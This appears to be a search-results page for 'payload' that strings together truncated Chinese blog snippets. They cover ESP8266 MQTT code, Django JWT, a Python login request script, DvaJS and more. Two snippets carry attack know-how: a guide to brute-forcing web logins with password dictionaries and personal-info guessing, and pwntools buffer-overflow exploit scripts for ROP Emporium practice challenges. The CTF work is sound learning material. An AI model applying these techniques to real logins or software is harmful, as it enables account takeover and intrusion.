payload

esp8266自定义工程框架 如何再起官方rtos sdk中规范的建立一个工程了，现在我们基于上一篇博客-esp8266对接阿里云平台做下规范。 首先将user_main.c中mqtt连接部分分离出来，写入user_mqtt.c中，分离是注意头文件包含，及一些全局变量设置。 user_main.c /* This example code is in the Public Domain (or CC0 licensed, at your option.) Unless required by applicable law or agreed to in writing, this software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. */ #include <stdio.h> //#include "esp_system.h" //#include "freertos/FreeRTOS.h" //#include "freertos/task.h" #include <stddef.h> #include <stdio.h> #include <string.h> #include "esp

前言 爆破在渗透测试中，对技术的要求不高，但是对技巧和字典的要求就很高了，本篇整理下平时学到的一些爆破思路和技巧(偏web渗透登陆)，当你无措可施时，暴力破解是最好的方式。 世界上最可怕的事情是你的习惯被别人掌握，一旦有律可循，You got Hacked。 爆破之字典准备 fuzz 字典 Blasting_dictionary :分享和收集各种字典，包括弱口令，常用密码，目录爆破。数据库爆破，编辑器爆破，后台爆破等。大型字典在big_dictionary.txt文件里 pydictor :一个强大实用的黑客暴力破解字典建立工具 猜密码 :密码网根据姓名、用户名、生日、邮箱、手机、历史密码、特殊数字等个人信息精确的分析出个人密码 genpAss :中国特色的弱口令生成器 somd5字典 :质量一般 姓名top10w/弱密码top21w :法师提供的字典 可以自定义规则的密码字典生成器 :该脚本的主要目标是根据定制的规则来组合生成出密码字典，主要目标是针对企业，希望对安全人员自查“符合密码策略的弱密码”有所帮助。 针对特定的厂商，重点构造厂商相关域名的字典，例如： 1 2 3 4 5 6 7 8 9 10 11 pwd_list = [ '%pwd%123' , '%user%123' , '%user%521' , '%user%2017' , '%pwd%321' , '%pwd

创建一个名为API的Django工程目录和名为Blog_RestApi的app API----->urls.py from django.contrib import admin from django.urls import path, include urlpatterns = [ path('admin/', admin.site.urls), path('api/',include('Blog_RestApi.urls')) ] API----->Blog_RestApi----->urls.py from django.urls import path, include from Blog_RestApi import views urlpatterns=[ path('sublogin/', views.SupLoginView.as_view()), path('suborder/', views.SubOrderView.as_view()), ] 生成jwt的token模块 Blog_RestApi---->utils---->jwt_create_token.py import datetime import jwt from django.conf import settings def create_token(payload, timeout=1): #

# coding:utf-8 import requests url = "https://passport.cnblogs.com/user/signin" # 接口地址 # 消息头数据 headers = { 'Connection': 'keep-alive', 'Content-Length': '123', 'Cache-Control': 'max-age=0', 'Origin':'https://passport.csdn.net', 'Upgrade-Insecure-Requests':'1', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Referer': 'https://passport.csdn.net/account/login?from

各大传送门： DvaJS Github DvaJS API与示例 了解 dva - dva = React-Router + Redux + Redux-saga + fetch - dva的初衷是（其实应该是redux的初衷）。提供一个公共的顶层的状态管理工具，专门为view层服务（实现双向数据流），而让react只专注专心负责渲染view层。 dva项目入口初始化 在初始化的时候，指定使用的路由模式，这里使用了hash模式。 import dva from 'dva'; import createHistory from 'history/createHashHistory'; // user BrowserHistory // import createHistory from 'history/createBrowserHistory'; // 1. Initialize const app = dva({ history: createHistory(), }); dva的几个规则: 1、通过dispatch调用namespace/effects 2、state(状态) 3、effects (异步操作) - 函数必须带*，也就是生成器。 - 第一个参数，可以拓展为{payload, callback} - 第二个参数，call和put - call 就是调用

Rop Emporium 最近在学习ROP，发现ROP Emporium这个网站上题目挺好，就一直在做，我这里用到查gadget的工具是ROPgadget，其他工具也是可以的。因为是直接从笔记上粘贴的，所以没有排版啥的，。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win32") payload="a"*0x28+"a"*4+"\x59\x86\x04\x08" sh.recvuntil(">") sh.sendline(payload) sh.interactive() ret2win_64 和32位一样，覆盖返回地址跳转到后门函数 from pwn import * sh=process("./ret2win") payload="a"*0x20+"a"*8+p64(0x0400811) sh.recvuntil(">") sh.sendline(payload) sh.interactive() split_32 程序的system中不是/bin/sh，通过查找字符串发现在数据段，将参数数据段参数传递给system就ok了 from pwn import * sh=process("./split32") payload="a"*0x28+"a"*4+p32